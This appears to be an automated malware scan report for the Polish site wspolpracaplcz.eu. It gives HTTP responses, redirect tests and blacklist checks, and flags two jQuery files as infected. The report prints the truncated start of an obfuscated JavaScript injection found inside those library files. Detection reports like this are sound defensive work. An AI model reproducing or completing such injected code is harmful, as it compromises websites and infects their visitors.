Scanned pages/files
Request | Server response | Status |
http://www.wspolpracaplcz.eu/ | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 05 Oct 2014 16:33:21 GMT Pragma: no-cache Location: http://wspolpracaplcz.eu/ Server: Microsoft-IIS/5.0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: kohanasession=0re0kdvci5bfc8m3srh9ssske3; expires=Sun, 05-Oct-2014 18:33:21 GMT; path=/; domain=wspolpracaplcz.eu Set-Cookie: kohanasession=0re0kdvci5bfc8m3srh9ssske3; expires=Sun, 05-Oct-2014 18:33:21 GMT; path=/; domain=wspolpracaplcz.eu Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiIwcmUwa2R2Y2k1YmZjOG0zc3JoOXNzc2tlMyI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA1LjEpIjtpcF9hZGRyZXNzfHM6MTM6Ijc4LjE1OC4xMS4yMjYiO2xhc3RfYWN0aXZpdHl8aToxNDEyNTI2ODAxOw%3D%3D; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu | clean |
http://wspolpracaplcz.eu/ | 200 OK Content-Length: 26797 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { $( "#open-login-form" ).click(function() { $( "#dialog-login-form" ).dialog({ height: 270, width: 350, modal: true, resizable: false, }); }); }); Antivirus reports:
| ||
http://wspolpracaplcz.eu/resources/website/js/jquery-1.5.min.js | 200 OK Content-Length: 88000 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3l","4a","4e","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41" Antivirus reports:
| ||
http://wspolpracaplcz.eu/resources/website/js/jquery-ui-1.8.10.custom.min.dev.js | 200 OK Content-Length: 210932 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"ody"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["cr"+"eateElement"]("div");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="asd"}catch(bawetawe){if(ww.document){v=window;n=["1e","3o","4d","46","3l","4c","41","47","46","16","1e","1f","16","4j","d","a","16","16","16","16","4e","3j","4a","16","3l","4a","4e","16","29","16","3m","47","3l","4d","45","3n","46","4c","1k","3l","4a","3n","3j","4c","3n","2h","44","3n","45","3n","46","4c","1e","1d","41" Antivirus reports:
| ||
http://www.wspolpracaplcz.eu/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wspolpracaplcz.eu
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 16:33:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/5.0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: kohanasession=94cksqi2nk16r7peebhbqijp32; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu
Set-Cookie: kohanasession=94cksqi2nk16r7peebhbqijp32; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI5NGNrc3FpMm5rMTZyN3BlZWJoYnFpanAzMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA1LjEpIjtpcF9hZGRyZXNzfHM6MTM6Ijc4LjE1OC4xMS4yMjYiO2xhc3RfYWN0aXZpdHl8aToxNDEyNTI2ODAyOw%3D%3D; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu
GET / HTTP/1.1
Host: wspolpracaplcz.eu
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 16:33:22 GMT
Pragma: no-cache
Server: Microsoft-IIS/5.0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: kohanasession=94cksqi2nk16r7peebhbqijp32; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu
Set-Cookie: kohanasession=94cksqi2nk16r7peebhbqijp32; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu
Set-Cookie: kohanasession_data=c2Vzc2lvbl9pZHxzOjI2OiI5NGNrc3FpMm5rMTZyN3BlZWJoYnFpanAzMiI7dG90YWxfaGl0c3xpOjE7X2tmX2ZsYXNoX3xhOjA6e311c2VyX2FnZW50fHM6NTA6Ik1vemlsbGEvNC4wIChjb21wYXRpYmxlOyBNU0lFIDguMDsgV2luZG93cyBOVCA1LjEpIjtpcF9hZGRyZXNzfHM6MTM6Ijc4LjE1OC4xMS4yMjYiO2xhc3RfYWN0aXZpdHl8aToxNDEyNTI2ODAyOw%3D%3D; expires=Sun, 05-Oct-2014 18:33:22 GMT; path=/; domain=wspolpracaplcz.eu
Second query (visit from search engine):
GET / HTTP/1.1
Host: wspolpracaplcz.eu
Referer: http://www.google.com/search?q=wspolpracaplcz.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wspolpracaplcz.eu
Referer: http://www.google.com/search?q=wspolpracaplcz.eu
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wspolpracaplcz.eu
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wspolpracaplcz.eu/
Result: wspolpracaplcz.eu is not infected or malware details are not published yet.
Result: wspolpracaplcz.eu is not infected or malware details are not published yet.